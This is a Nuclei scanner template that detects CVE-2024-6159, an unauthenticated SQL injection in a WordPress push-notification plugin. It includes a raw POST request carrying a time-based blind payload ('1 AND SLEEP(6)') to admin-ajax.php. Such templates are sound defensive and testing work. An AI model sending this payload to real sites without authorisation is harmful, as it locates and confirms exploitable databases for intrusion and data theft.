53 lines
2.2 KiB
YAML
53 lines
2.2 KiB
YAML
id: CVE-2024-6159
|
|
|
|
info:
|
|
name: Push Notification for Post and BuddyPress <= 1.93 - SQL Injection
|
|
author: s4e-io
|
|
severity: critical
|
|
description: |
|
|
Push Notification for Post and BuddyPress plugin for WordPress is vulnerable to SQL Injection via the 'onesignal_externalid' and 'onesignal_get_subscriptionoptions_id' paramters in all versions up to, and including, 1.93 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
|
|
reference:
|
|
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/push-notification-for-post-and-buddypress/push-notification-for-post-and-buddypress-193-unauthenticated-sql-injection
|
|
- https://wpscan.com/vulnerability/de20ebda-b0bc-489e-a8d3-e9487a2b48e8/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2024-6159
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
framework: wordpress
|
|
publicwww-query: "/wp-content/plugins/push-notification-for-post-and-buddypress"
|
|
tags: cve,cve2024,wpscan,wp-plugin,wordpress,push-notification
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET / HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body, "/wp-content/plugins/push-notification-for-post-and-buddypress")'
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
@timeout 50s
|
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
|
|
|
action=icpushcallback&onesignal_externalid=1+AND+SLEEP(6)&pushtype=onesignal_subscribed_users
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'contains(content_type,"text/html")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 4a0a00473045022100ef9c46702e7c567f42d222e0302a0dca26c2c7c554442c198a024cd848198d1702206589b6344625c0b7cba63b49d9c78aed5e01b26943c1e673a09a1adc90ff919a:922c64590222798bb761d5b6d8e72950 |